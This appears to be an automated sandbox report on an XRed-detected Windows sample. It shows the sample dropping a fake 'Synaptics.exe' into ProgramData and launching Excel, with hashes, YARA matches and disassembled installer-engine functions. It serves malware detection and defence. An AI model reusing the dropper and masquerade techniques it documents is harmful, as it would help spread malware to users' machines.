2025-01-02 19:41:47 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Target ID:	0
Start time:	14:40:30
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	15'745'536 bytes
MD5 hash:	7E33585D157419E39FB4D232C9F0C5DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:40:31
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\._cache_file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\._cache_file.exe"
Imagebase:	0x90000
File size:	14'974'024 bytes
MD5 hash:	F0248D477E74687C5619AE16498B13D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	14:40:31
Start date:	02/01/2025
Path:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572
Imagebase:	0x690000
File size:	647'704 bytes
MD5 hash:	843288FD72A1152B50B4E4B7344BB592
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	14:40:33
Start date:	02/01/2025
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	B753207B14C635F29B2ABF64F603570A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	14:40:35
Start date:	02/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0x2a0000
File size:	53'161'064 bytes
MD5 hash:	4A871771235598812032C822E6F68F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	14:40:41
Start date:	02/01/2025
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe"
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	B753207B14C635F29B2ABF64F603570A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:42:37
Start date:	02/01/2025
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff6d0c40000
File size:	163'840 bytes
MD5 hash:	77DE7761B037061C7C112FD3C5B91E73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 0009508D Relevance: 44.1, APIs: 5, Strings: 20, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 0009510F

Part of subcall function 000D03F0: InitializeCriticalSection.KERNEL32(000FB60C,?,0009511B,00000000,?,?,?,?,?,?), ref: 000D0407

Part of subcall function 00091209: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00095137,00000000,?), ref: 00091247
Part of subcall function 00091209: GetLastError.KERNEL32(?,?,?,00095137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00091251

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 0009517D

Part of subcall function 000D0CD1: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 000D0CF2

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 0009520F
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00095219
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0009549B

Strings

Failed to initialize XML util., xrefs: 000951F1
3.10.4.4718, xrefs: 0009527C
_Failed, xrefs: 000953F7
engine.cpp, xrefs: 0009523D
Failed to run untrusted mode., xrefs: 000953AE
Failed to initialize engine state., xrefs: 00095164
Invalid run mode., xrefs: 000952F1
Failed to initialize Regutil., xrefs: 000951C1
Failed to run per-machine mode., xrefs: 00095364
Failed to run per-user mode., xrefs: 0009538C
Failed to run embedded mode., xrefs: 0009533C
Failed to run RunOnce mode., xrefs: 00095314
txt, xrefs: 000953F2
Failed to get OS info., xrefs: 00095247
Setup, xrefs: 000953FC
Failed to parse command line., xrefs: 0009513D
Failed to initialize COM., xrefs: 00095189
Failed to initialize Cryputil., xrefs: 0009519E
Failed to initialize core., xrefs: 000952BB
Failed to initialize Wiutil., xrefs: 000951D9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.10.4.4718$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$Setup$_Failed$engine.cpp$txt
API String ID: 3262001429-867073019
Opcode ID: 4ac87f2a28f61bbf786ff0779aef2511d8bbaff0f88decfaf44b10172558783d
Instruction ID: dae4acd56eb6a18c382c17f5dd298462e0b2d7832439db09be2a8cba966b7761
Opcode Fuzzy Hash: 4ac87f2a28f61bbf786ff0779aef2511d8bbaff0f88decfaf44b10172558783d
Instruction Fuzzy Hash: 09B1B671D41B299BDF73AF65CC46BED76A4AF04702F010196F908A6342DB719E80AFA1

Function 000D2F23 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152
libraryloadercomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,000D34DF,00000000,?,00000000), ref: 000D2F3D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000BBDED,?,000952FD,?,00000000,?), ref: 000D2F49
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 000D2F89
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000D2F95
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 000D2FA0
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000D2FAA
CoCreateInstance.OLE32(000FB6C8,00000000,00000001,000DB808,?,?,?,?,?,?,?,?,?,?,?,000BBDED), ref: 000D2FE5
ExitProcess.KERNEL32 ref: 000D3094

Strings

xmlutil.cpp, xrefs: 000D2F6D
Wow64DisableWow64FsRedirection, xrefs: 000D2F8F
IsWow64Process, xrefs: 000D2F83
Wow64EnableWow64FsRedirection, xrefs: 000D2F97
Wow64RevertWow64FsRedirection, xrefs: 000D2FA2
kernel32.dll, xrefs: 000D2F2D

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: 690d72d1a1ad6fe50b0ed6f16c80a47ab8ba5f1cded1d0afb62ba0cc93ebebcc
Instruction ID: 376b489214b3fb7b62bde4d05d359a50f13fd30650b561aa1e6200e4c8c2e78f
Opcode Fuzzy Hash: 690d72d1a1ad6fe50b0ed6f16c80a47ab8ba5f1cded1d0afb62ba0cc93ebebcc
Instruction Fuzzy Hash: 3E41A331A01319ABDB209FA8C854BAEBBE4EF44711F11406AEA01EB751DB75DE409BB1

Function 00091070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000933D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000910DD,?,00000000), ref: 000933F8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 000910F6

Part of subcall function 00091174: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0009111A,cabinet.dll,00000009,?,?,00000000), ref: 00091185
Part of subcall function 00091174: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,0009111A,cabinet.dll,00000009,?,?,00000000), ref: 00091190
Part of subcall function 00091174: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0009119E
Part of subcall function 00091174: GetLastError.KERNEL32(?,?,?,?,0009111A,cabinet.dll,00000009,?,?,00000000), ref: 000911B9
Part of subcall function 00091174: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000911C1
Part of subcall function 00091174: GetLastError.KERNEL32(?,?,?,?,0009111A,cabinet.dll,00000009,?,?,00000000), ref: 000911D6

CloseHandle.KERNEL32(?,?,?,?,000DB4C0,?,cabinet.dll,00000009,?,?,00000000), ref: 00091131

Strings

msasn1.dll, xrefs: 000910C3
feclient.dll, xrefs: 000910D1
wininet.dll, xrefs: 000910AE
crypt32.dll, xrefs: 000910CA
comres.dll, xrefs: 000910B5
cabinet.dll, xrefs: 00091099
msi.dll, xrefs: 000910A0
version.dll, xrefs: 000910A7
clbcatq.dll, xrefs: 000910BC

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: 90f6cf3a3e3e72f59b7882c91da3efa01c2c7416d3807d2f9f5dc63159e76d5b
Instruction ID: 193cceff52784844ffbb02f3609d0c3a7873a07fbfbae0cefbbb13e92aac39e4
Opcode Fuzzy Hash: 90f6cf3a3e3e72f59b7882c91da3efa01c2c7416d3807d2f9f5dc63159e76d5b
Instruction Fuzzy Hash: 38216071A00309EBDB10DFA5DC45BEEBBB8EF45714F11411AEA20B7292D7749904DBB0

Function 000A9EB7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to calculate working folder to ensure it exists., xrefs: 000A9ED4
=S, xrefs: 000A9EB7
Failed to copy working folder., xrefs: 000A9F12
Failed create working folder., xrefs: 000A9EEA

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: =S$Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-23846267
Opcode ID: 49abd25b18bb909c89b6a900f1d19b0eac60ced659a7f3a48453f8603ff4d1de
Instruction ID: d9abe93e09ebdb425b03d6a52bfbc5515b93c9b8b857071c75a225098f288e76
Opcode Fuzzy Hash: 49abd25b18bb909c89b6a900f1d19b0eac60ced659a7f3a48453f8603ff4d1de
Instruction Fuzzy Hash: 16018831E05668FF9F229B95DC06CAF7A74DF92760B204266F904B6212DB328E10A6D0

Function 000938D4 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: c61ccd8c138798da61a344234904395450db033cb66d534b1e0a6d4f97f20d15
Instruction ID: bace933704e9fc28841d6049e8ac61bb609b5f4b73585092da8583b1f671948d
Opcode Fuzzy Hash: c61ccd8c138798da61a344234904395450db033cb66d534b1e0a6d4f97f20d15
Instruction Fuzzy Hash: 51C012361A0218EB8B006FF8EC0EC9A3BACAB68A027408402B905C2110CB3CE0148B70

Function 0009DE25 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 0009DF4A
SysFreeString.OLEAUT32(00000000), ref: 0009E62A

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

Strings

InstallSize, xrefs: 0009E0F1
Failed to get @PerMachine., xrefs: 0009E5BA
PerMachine, xrefs: 0009E10C
=S, xrefs: 0009DE25
Invalid cache type: %ls, xrefs: 0009E5DE
Failed to allocate memory for rollback boundary structs., xrefs: 0009DEBC
cabinet.dll, xrefs: 0009E0F0
Failed to get @Cache., xrefs: 0009E5EE
Failed to get @LogPathVariable., xrefs: 0009E3D7
Failed to get package node count., xrefs: 0009DFA3
msi.dll, xrefs: 0009E0BA
Failed to get next node., xrefs: 0009E5FC
Failed to get @RollbackLogPathVariable., xrefs: 0009E3E1
Failed to allocate memory for MSP patch sequence information., xrefs: 0009E3CD
feclient.dll, xrefs: 0009E18A
Failed to get @RollbackBoundaryForward., xrefs: 0009E402
wininet.dll, xrefs: 0009E14C
MsiPackage, xrefs: 0009E287
Failed to allocate memory for patch sequence information to package lookup., xrefs: 0009E464
always, xrefs: 0009E099
Failed to parse target product codes., xrefs: 0009E58F
Vital, xrefs: 0009DF19, 0009E14D
Failed to get @InstallSize., xrefs: 0009E5C1
Failed to get @Permanent., xrefs: 0009E5B3
Failed to get @Size., xrefs: 0009E5C8
Failed to parse payload references., xrefs: 0009E5A5
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 0009DF73
Failed to parse MSI package., xrefs: 0009E2B3
MspPackage, xrefs: 0009E2BF
Permanent, xrefs: 0009E127
Failed to find backward transaction boundary: %ls, xrefs: 0009E40F
RollbackBoundary, xrefs: 0009DE48
Failed to select package nodes., xrefs: 0009DF86
Cache, xrefs: 0009E03D
Failed to parse MSP package., xrefs: 0009E423
crypt32.dll, xrefs: 0009E1AD
RollbackLogPathVariable, xrefs: 0009E18B
Failed to get @Vital., xrefs: 0009E5AC
InstallCondition, xrefs: 0009E1AE
RollbackBoundaryBackward, xrefs: 0009E20B
yes, xrefs: 0009E079
Failed to get rollback bundary node count., xrefs: 0009DE80
Failed to get @RollbackBoundaryBackward., xrefs: 0009E419
clbcatq.dll, xrefs: 0009E10B
Failed to allocate memory for package structs., xrefs: 0009DFE1
package.cpp, xrefs: 0009DEB0, 0009DFD5, 0009E3C1, 0009E458
Failed to find forward transaction boundary: %ls, xrefs: 0009E3F8
MsuPackage, xrefs: 0009E2F8
Size, xrefs: 0009E0D6
comres.dll, xrefs: 0009E126
Failed to get @CacheId., xrefs: 0009E5CF
Failed to parse MSU package., xrefs: 0009E42D
ExePackage, xrefs: 0009E249
Failed to parse EXE package., xrefs: 0009E27B
RollbackBoundaryForward, xrefs: 0009E1D1
CacheId, xrefs: 0009E0BB
Failed to select rollback boundary nodes., xrefs: 0009DE5B
LogPathVariable, xrefs: 0009E168
Failed to get @Id., xrefs: 0009E5F5
Failed to get @InstallCondition., xrefs: 0009E3EB
Failed to parse dependency providers., xrefs: 0009E59E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: =S$Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
API String ID: 336948655-1483295644
Opcode ID: 5e23e1bb7be1a423c1b823846eeeafad0f374b1c449755d47cab51f6cba446bb
Instruction ID: e719d5ef6ec2303cbf18de745d620aea2adf12ff1e5b8946b4f7d2e4c19424fd
Opcode Fuzzy Hash: 5e23e1bb7be1a423c1b823846eeeafad0f374b1c449755d47cab51f6cba446bb
Instruction Fuzzy Hash: DC32C171940766EFCF21DB50CC42FAEBBB4AB04724F114265FA11BB291D7B1AE40AB90

Function 0009F86E Relevance: 117.7, APIs: 3, Strings: 64, Instructions: 445
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get @Comments., xrefs: 0009FB4A
Failed to get @DisableModify., xrefs: 0009FC42
Tag, xrefs: 0009F8E1
Failed to get @PerMachine., xrefs: 0009F9AF
Failed to get @Publisher., xrefs: 0009FA69
Update, xrefs: 0009FCA8
Failed to get @Classification., xrefs: 0009FD7F
Failed to set registration paths., xrefs: 0009FD92
Comments, xrefs: 0009FB33
DisableModify, xrefs: 0009FB80
Manufacturer, xrefs: 0009FCDD
HelpTelephone, xrefs: 0009FA9C
button, xrefs: 0009FB9F
PerMachine, xrefs: 0009F99C
Arp, xrefs: 0009F9BD
ProductFamily, xrefs: 0009FD26
=S, xrefs: 0009F86E
Failed to parse @Version: %ls, xrefs: 0009F94F
Failed to get @Version., xrefs: 0009F92E
Failed to select ARP node., xrefs: 0009F9D9
Failed to get @Manufacturer., xrefs: 0009FCF0
ProviderKey, xrefs: 0009F95D
Failed to get @UpdateUrl., xrefs: 0009FAFD
Failed to get @DisplayVersion., xrefs: 0009FA44
Failed to get @Name., xrefs: 0009FD5E
DisplayVersion, xrefs: 0009FA2D
Invalid modify disabled type: %ls, xrefs: 0009FC1E
Failed to parse software tag., xrefs: 0009FC9A
Failed to get @ExecutableName., xrefs: 0009F991
Failed to select registration node., xrefs: 0009F8A6
Contact, xrefs: 0009FB5B
msasn1.dll, xrefs: 0009F8BF
DisplayName, xrefs: 0009FA08
Register, xrefs: 0009F9E7
Registration, xrefs: 0009F888
Name, xrefs: 0009FD4B
Failed to select Update node., xrefs: 0009FCC6
Failed to get @Department., xrefs: 0009FD18
Failed to get @ProductFamily., xrefs: 0009FD3D
Failed to get @HelpLink., xrefs: 0009FA8E
Failed to get @AboutUrl., xrefs: 0009FAD8
Failed to get @Contact., xrefs: 0009FB72
registration.cpp, xrefs: 0009FC11
Failed to get @ParentDisplayName., xrefs: 0009FB22
yes, xrefs: 0009FBC0
clbcatq.dll, xrefs: 0009F8E0
Publisher, xrefs: 0009FA52
Failed to get @ProviderKey., xrefs: 0009F970
HelpLink, xrefs: 0009FA77
ParentDisplayName, xrefs: 0009FB0B
Classification, xrefs: 0009FD6C
Version, xrefs: 0009F91B
Failed to get @DisableRemove., xrefs: 0009FC6A
Failed to get @DisplayName., xrefs: 0009FA1F
DisableRemove, xrefs: 0009FC53
Failed to get @Tag., xrefs: 0009F8F4
Failed to parse related bundles, xrefs: 0009F90D
Failed to get @HelpTelephone., xrefs: 0009FAB3
Failed to get @Id., xrefs: 0009F8D3
UpdateUrl, xrefs: 0009FAE6
Department, xrefs: 0009FD01
Failed to get @Register., xrefs: 0009F9FA
AboutUrl, xrefs: 0009FAC1
ExecutableName, xrefs: 0009F97E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID: =S$AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
API String ID: 0-2206336810
Opcode ID: 402f633d29be342bec2a7d9a75eb67b53f762351d15459f7139008d697fc58b6
Instruction ID: a458409e0f4673cde3a865a29a3d2cc98292c82dec7eaa5ad38a1b541e26690b
Opcode Fuzzy Hash: 402f633d29be342bec2a7d9a75eb67b53f762351d15459f7139008d697fc58b6
Instruction Fuzzy Hash: 39E1B872E817A7BFCF2196A1CC41EFDBA65AB00710F110275FE20FA291D7B15E50A791

Function 0009B389 Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 565
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0009B3FF
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B44C
GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0009B452
ReadFile.KERNELBASE(00000000,\CH,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B49A
GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0009B4A0
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B4FD
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B503
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B54C
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B552
